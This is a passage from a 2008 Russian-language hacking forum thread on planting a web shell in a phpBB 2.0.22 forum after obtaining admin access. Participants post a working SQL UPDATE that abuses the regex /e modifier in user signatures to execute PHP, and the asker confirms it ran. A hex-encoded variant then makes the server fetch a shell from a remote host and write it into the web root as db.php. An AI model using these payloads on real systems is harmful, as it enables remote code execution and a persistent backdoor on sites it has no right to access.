Форум АНТИЧАТ - заливка shell

Страница 1 из 3

Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)

- - заливка shell - phpbb2 (https://forum.antichat.xyz/showthread.php?t=67591)

number0

17.04.2008 18:59

заливка shell - phpbb2

Здраствуйте! Версия форума 2.0.22 чистый (без модов). Что есть:
1. админский акуант (доступ в админку)
2. серверный путь к форуму
3. config.php
ftp доступа нету. =( БД не root.

Собственно вопрос... как загрузить shell ?

Sleep

17.04.2008 19:04

глянь
https://forum.antichat.ru/thread24488.html
и тут на ачате видео еще было по заливки шелла через бд

vp$	17.04.2008 19:07

если file_priv=N
то никакое видео не поможет, и врятли что то можно сделать

Scipio

17.04.2008 19:20

несколько раз заливал через

Цитата:

UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:phpinfo()' WHERE user_id=2;

но при этом у меня всегда был доступ к БД, через phpMyAdmin
насчет твоей версии незнаю

number0

17.04.2008 19:29

на форуме майскл имеет права file_priv=N

Scipio

17.04.2008 19:32

для того способа который я сказал file_priv не имеет значения

number0

17.04.2008 19:39

Цитата:

UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:phpinfo()' WHERE user_id=2;

Да, сроботал. PHP Version показало.
мм.. может уже есть и готовый шелл под скрипт выше указаный? С99 хотелось бы...

Scipio

17.04.2008 19:44

в user_sig пропиши phpbb:copy("http://путь до шелла/шелл.txt","/путь до папки/куда лить/шелл.php")

number0

17.04.2008 19:59

Цитата:

UPDATE phpbb_users SET user_sig_phpbb:copy=("http://192.168.10.5/db.txt","/var/www/html/forum/db.php") WHERE user_id=2;

Не дало востановить БД. Где-то ошибочку допустил.. подправте пожалуйста.

Цитата:

SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near

Scipio

17.04.2008 20:04

Код:

UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig=0x70687062623A636F70792822687474703A2F2F3139322E3136382E31302E352F64622E747874222C222F7661722F7777772F68746D6C2F666F72756D2F64622E7068702229 WHERE user_id=2;

не забудь пробелы убрать здесь:
F2F3 139322E3136382E31302E352F64622E747874222C222F76617 22F

Время: 13:25

Страница 1 из 3

Показывать 40 сообщений этой темы на одной странице